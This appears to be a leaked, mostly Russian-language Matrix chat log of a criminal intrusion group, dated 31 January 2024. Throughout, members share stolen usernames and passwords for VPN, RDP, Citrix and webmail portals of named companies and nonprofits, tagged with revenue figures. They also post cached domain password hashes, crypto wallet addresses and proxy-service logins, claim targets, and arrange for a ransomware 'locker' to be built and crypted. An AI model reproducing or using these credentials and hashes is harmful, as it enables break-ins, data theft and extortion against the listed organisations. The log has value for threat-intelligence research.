[2024-01-31 17:05:05] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> lendi jdat kogda

к понедельнику все будет готово
--------------------
[2024-01-31 17:05:13] @n3auxaxl:matrix.collectionofmanager.space: я по боту заканчиваю хотфиксы
--------------------
[2024-01-31 17:17:12] @ssd:matrix.bestflowers247.online: k
--------------------
[2024-01-31 17:17:44] @usernamegg:matrix.bestflowers247.online: вцц?
--------------------
[2024-01-31 17:17:54] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-01-31 17:17:56] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2024-01-31 17:18:25] @ssd:matrix.bestflowers247.online: da
--------------------
[2024-01-31 17:18:39] @ssd:matrix.bestflowers247.online: prosto na kow kin
--------------------
[2024-01-31 17:18:44] @ssd:matrix.bestflowers247.online: i zavedu na vcc
--------------------
[2024-01-31 17:18:46] @ssd:matrix.bestflowers247.online: sam
--------------------
[2024-01-31 17:19:20] @usernamegg:matrix.bestflowers247.online: скрин на тендерберд настростроку скинь плз
--------------------
[2024-01-31 17:23:33] @usernameyy:matrix.bestflowers247.online: image.png
--------------------
[2024-01-31 17:23:41] @usernameyy:matrix.bestflowers247.online: continue->add exception->done
--------------------
[2024-01-31 17:23:49] @usernameyy:matrix.bestflowers247.online: ничего настраивать отдельно не надо
--------------------
[2024-01-31 17:23:54] @usernameyy:matrix.bestflowers247.online: в последниях версиях тандерберда
--------------------
[2024-01-31 17:41:36] @usernamegg:matrix.bestflowers247.online: все все
--------------------
[2024-01-31 17:41:41] @usernamegg:matrix.bestflowers247.online: я нстроил
--------------------
[2024-01-31 17:41:42] @usernamegg:matrix.bestflowers247.online: спс
--------------------
[2024-01-31 18:12:44] @u123:matrix.bestflowers247.online: а брутят и рдп тоже или впнки только?
--------------------
[2024-01-31 18:17:49] @usernamenn:matrix.bestflowers247.online: https://forum.exploit.in/topic/211695/
--------------------
[2024-01-31 18:26:19] @usernamegg:matrix.bestflowers247.online: 0xB54c17E5ea215f45A61E8790cf546AD175Af2Cf0
--------------------
[2024-01-31 18:42:10] @usernamenn:matrix.bestflowers247.online: https://mega.nz/folder/uNhkgJhR#KafExw97u2vM3QNtAdVC9A
--------------------
[2024-01-31 18:51:00] @usernamenn:matrix.bestflowers247.online: https://forum.exploit.in/topic/236790/
--------------------
[2024-01-31 19:50:06] @usernameww:matrix.bestflowers247.online: есть кто?
--------------------
[2024-01-31 19:55:27] @ssd:matrix.bestflowers247.online: bc1qqj6pp5d00rq8646cxj2648vkwkm9pqxafd3zmt
--------------------
[2024-01-31 19:55:36] @ssd:matrix.bestflowers247.online: new kow
--------------------
[2024-01-31 19:58:18] @usernamegg:matrix.bestflowers247.online: Last login: Wed Jan 31 11:53:11 on ttys001
a@MacBook-Pro-som-tillhor-a ~ % cd /Library/Java/JavaVirtualMachines
a@MacBook-Pro-som-tillhor-a JavaVirtualMachines % ls
a@MacBook-Pro-som-tillhor-a JavaVirtualMachines % cd /home/user/myJavaApp
cd: no such file or directory: /home/user/myJavaApp
a@MacBook-Pro-som-tillhor-a JavaVirtualMachines %


--------------------
[2024-01-31 20:09:18] @usernamegg:matrix.bestflowers247.online: https://portal1.willislease.com/
51.140.116.255:443:apatterson:Winter2023
https://www.zoominfo.com/c/willis-lease-finance-corp/131547328 270kk
--------------------
[2024-01-31 20:09:28] @usernamegg:matrix.bestflowers247.online: ____
--------------------
[2024-01-31 20:09:28] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 20:09:40] @usernamegg:matrix.bestflowers247.online: csrox.org 44kk usa
yourunitedway.org
https://prnt.sc/LzIUwWuFPBKa
___
--------------------
[2024-01-31 20:10:09] @usernamegg:matrix.bestflowers247.online: 5B
:test:Password1 (uat.acus.amadeus.com.) CITRIX
https://uat.acus.amadeus.com/Citrix/StoreWeb/
_____
--------------------
[2024-01-31 20:10:58] @usernamenn:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> 5B
> :test:Password1 (uat.acus.amadeus.com.) CITRIX
> https://uat.acus.amadeus.com/Citrix/StoreWeb/
> _____

++
--------------------
[2024-01-31 20:11:35] @usernamess:matrix.bestflowers247.online: ```
exelaonline.com
https://mail.exelaonline.com
https://178.22.87.76/owa/auth/logon.aspx
```
--------------------
[2024-01-31 20:28:33] @usernameww:matrix.bestflowers247.online: 1kekhash.txt
--------------------
[2024-01-31 20:33:56] @usernamezz:matrix.bestflowers247.online: ```
csrox.org 44kk usa
yourunitedway.org
https://prnt.sc/LzIUwWuFPBKa
+
```
--------------------
[2024-01-31 20:56:11] @usernamegg:matrix.bestflowers247.online: есть кто живой ?
--------------------
[2024-01-31 20:56:20] @usernamegg:matrix.bestflowers247.online: как придешь сделай локер
--------------------
[2024-01-31 20:56:22] @usernamegg:matrix.bestflowers247.online: крипт
--------------------
[2024-01-31 20:57:41] @usernamegg:matrix.bestflowers247.online: 418f9926-d7f1-402a-84b6-befa15c8b937_encrypt_release_allsystem_x64.zip
--------------------
[2024-01-31 20:57:48] @usernamegg:matrix.bestflowers247.online: 9b8520f5-439c-4184-8212-0f1114b4b269_encrypt_release_allsystem_x64.zip
--------------------
[2024-01-31 20:58:28] @usernamegg:matrix.bestflowers247.online: 418f9926-d7f1-402a-84b6-befa15c8b937_encrypt_release_allsystem_x64.zip
--------------------
[2024-01-31 20:58:33] @usernamegg:matrix.bestflowers247.online: 9b8520f5-439c-4184-8212-0f1114b4b269_encrypt_release_allsystem_x64.zip
--------------------
[2024-01-31 20:59:11] @usernamegg:matrix.bestflowers247.online: SINGE VPN
--------------------
[2024-01-31 20:59:20] @usernamegg:matrix.bestflowers247.online: 91.208.127.142.tar
--------------------
[2024-01-31 20:59:21] @usernamegg:matrix.bestflowers247.online: 91.208.127.137.tar
--------------------
[2024-01-31 20:59:21] @usernamegg:matrix.bestflowers247.online: 91.208.127.135.tar
--------------------
[2024-01-31 20:59:22] @usernamegg:matrix.bestflowers247.online: 91.208.127.133.tar
--------------------
[2024-01-31 20:59:22] @usernamegg:matrix.bestflowers247.online: 91.208.127.127.tar
--------------------
[2024-01-31 20:59:22] @usernamegg:matrix.bestflowers247.online: 91.208.127.122.tar
--------------------
[2024-01-31 20:59:22] @usernamegg:matrix.bestflowers247.online: 45.82.177.210.tar
--------------------
[2024-01-31 20:59:23] @usernamegg:matrix.bestflowers247.online: 185.154.14.219.tar
--------------------
[2024-01-31 20:59:29] @usernamess:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

$$
--------------------
[2024-01-31 20:59:30] @usernamecc:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

cc
--------------------
[2024-01-31 20:59:43] @usernamezz:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

+
--------------------
[2024-01-31 20:59:48] @usernamenn:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

++
--------------------
[2024-01-31 20:59:56] @usernamejj:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

++
--------------------
[2024-01-31 21:00:03] @usernameww:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

++
--------------------
[2024-01-31 21:01:15] @usernamett:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

TT
--------------------
[2024-01-31 21:02:03] @usernamemm:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

MM
--------------------
[2024-01-31 21:04:54] @usernamegg:matrix.bestflowers247.online: `https://remote.dilweg.com/RDWeb/Pages/en-US/login.aspx :scanner@dilweg.com:Passw0rd 20кк`
--------------------
[2024-01-31 21:05:03] @usernamezz:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> `https://remote.dilweg.com/RDWeb/Pages/en-US/login.aspx :scanner@dilweg.com:Passw0rd 20кк`

+
--------------------
[2024-01-31 21:05:11] @usernamegg:matrix.bestflowers247.online: https://access.csrox.org/RDWeb/Pages/en-US/login.aspx :scanner@csrox.org:scanner
--------------------
[2024-01-31 21:05:18] @usernamegg:matrix.bestflowers247.online: * https://remote.dilweg.com/RDWeb/Pages/en-US/login.aspx :scanner@dilweg.com:Passw0rd 20кк
--------------------
[2024-01-31 21:05:34] @usernamegg:matrix.bestflowers247.online: https://prnt.sc/LzIUwWuFPBKa
https://vo.yourunitedway.org/RDWeb/Pages/en-US/login.aspx :scanner@yourunitedway.org:P@ssw0rd!
--------------------
[2024-01-31 21:05:39] @usernamegg:matrix.bestflowers247.online: * https://access.csrox.org/RDWeb/Pages/en-US/login.aspx :scanner@csrox.org:scanner
_____
--------------------
[2024-01-31 21:05:43] @usernamegg:matrix.bestflowers247.online: * https://prnt.sc/LzIUwWuFPBKa
https://vo.yourunitedway.org/RDWeb/Pages/en-US/login.aspx :scanner@yourunitedway.org:P@ssw0rd!
___
--------------------
[2024-01-31 21:08:09] @usernamemm:matrix.bestflowers247.online: `csrox.org`


--------------------
[2024-01-31 21:18:51] @usernamejj:matrix.bestflowers247.online: ```
https://188.39.50.90/+CSCOE+/logon.html :support:qwerty:AnyConnectVPN
https://www.zoominfo.com/c/ffp-packaging-solutions/25921955 23kk UK
```
--------------------
[2024-01-31 21:21:25] @usernamegg:matrix.bestflowers247.online: `https://ne-asa.ghx.com/+CSCOE+/logon.html:testuser1:testuser1`
--------------------
[2024-01-31 21:21:36] @usernamegg:matrix.bestflowers247.online: * https://ne-asa.ghx.com/+CSCOE+/logon.html:testuser1:testuser1
--------------------
[2024-01-31 21:59:10] @ssd:matrix.bestflowers247.online: hi
--------------------
[2024-01-31 21:59:20] @ssd:matrix.bestflowers247.online: nujen servak
--------------------
[2024-01-31 22:04:39] @usernameww:matrix.bestflowers247.online: ```
$DCC2$10240#jhernandez#b7c3ff1b8537821be4e46d3529435cdb
$DCC2$10240#mmiron#73bd807e784997bc866c3b65ac961251
$DCC2$10240#svc_automate#503879453166b9ff788ed7e537b4ccbd
```
--------------------
[2024-01-31 22:05:15] @usernameww:matrix.bestflowers247.online: `:$DCC2$10240#jmason#34a25150647a4cfd4b7f63a7e50a69ff`
--------------------
[2024-01-31 22:15:30] @usernamegg:matrix.bestflowers247.online: https://grvpn.globalrescue.com/dana-na/auth/url_default/welcome.cgi :admin:Password123

КТо взял в работу ?
--------------------
[2024-01-31 22:19:22] @usernamess:matrix.bestflowers247.online: Мы предоставляем лучшие комплексные услуги в области медицины, безопасности, управления рисками путешествий и кризисного управления, доступные в любой точке мира, предоставляемые нашими командами интенсивной терапии. фельдшеры, врачи, медсестры и ветераны военных спецопераций. Наши медицинские консультации и услуги по эвакуации включают эксклюзивные отношения с Отделом специальных операций Департамента неотложной медицины Джонса Хопкинса, Elite Medical Group и Partners HealthCare. Наш послужной список сделал нас выбранным поставщиком для государственных учреждений и некоторых крупнейших мировых компаний, университетов, некоммерческих организаций и туроператоров. Наша миссия проста – быть рядом, когда это важнее всего.
--------------------
[2024-01-31 22:24:49] @usernamegg:matrix.bestflowers247.online: _____
--------------------
[2024-01-31 22:36:40] @usernamess:matrix.bestflowers247.online: image.png
--------------------
[2024-01-31 22:51:01] @usernamess:matrix.bestflowers247.online: `https://grvpn.globalrescue.com/dana-na/auth/url_default/welcome.cgi :admin:Password123`
--------------------
[2024-01-31 22:53:59] @usernamegg:matrix.bestflowers247.online: 358822f4-705d-41da-8dcc-84960c24fa88
--------------------
[2024-01-31 22:53:59] @usernamezz:matrix.bestflowers247.online: `https://mail.ssmnlaw.com:4434/sslvpn_logon.shtml:scanner:scanner:sstmnlaw.lan`
--------------------
[2024-01-31 22:54:09] @usernamezz:matrix.bestflowers247.online: > <@usernamezz:matrix.bestflowers247.online> `https://mail.ssmnlaw.com:4434/sslvpn_logon.shtml:scanner:scanner:sstmnlaw.lan`

DONE
--------------------
[2024-01-31 22:54:27] @usernamegg:matrix.bestflowers247.online: https://sslvpn.spu.ac.th/dana-na/auth/url_default/welcome.cgi:63480119:3401000052045
--------------------
[2024-01-31 22:55:14] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 23:19:46] @usernamenn:matrix.bestflowers247.online: https://www.lsuhsc.edu/admin/it/helpdesk/vpn/docs/IVANTI%20Client%20for%20Windows.pdf

**IVANTI INSTALLER - СКАЧАТЬ ВСЕМ!**

https://www.lsuhsc.edu/admin/it/helpdesk/vpn/docs/ps-pulse-win-22.3r1.0-b18209-64bit-installer.msi

**MSI скачайте.**
--------------------
[2024-01-31 23:21:59] @usernamenn:matrix.bestflowers247.online: **WINDOWS 10 Installer** > https://www.lsuhsc.edu/admin/it/helpdesk/vpn/docs/ps-pulse-win-9.1r11.0-b6725-64bitinstaller.msi
--------------------
[2024-01-31 23:28:29] @usernamegg:matrix.bestflowers247.online: ```
https://proxytraff.com/en
brimladgedman65@proton.me
qwe123
```
--------------------
[2024-01-31 23:28:45] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-31 в 15.28.35.png
--------------------
[2024-01-31 23:28:54] @usernamegg:matrix.bestflowers247.online: зайдешь выберешь тариф
--------------------
[2024-01-31 23:28:59] @usernamegg:matrix.bestflowers247.online: возьмешь список соксов
--------------------
[2024-01-31 23:29:06] @usernamegg:matrix.bestflowers247.online: или по api настроишь
--------------------
[2024-01-31 23:29:12] @usernamegg:matrix.bestflowers247.online: баланс там есть
--------------------
[2024-01-31 23:29:44] @usernamegg:matrix.bestflowers247.online: можешь тестово микс взять
--------------------
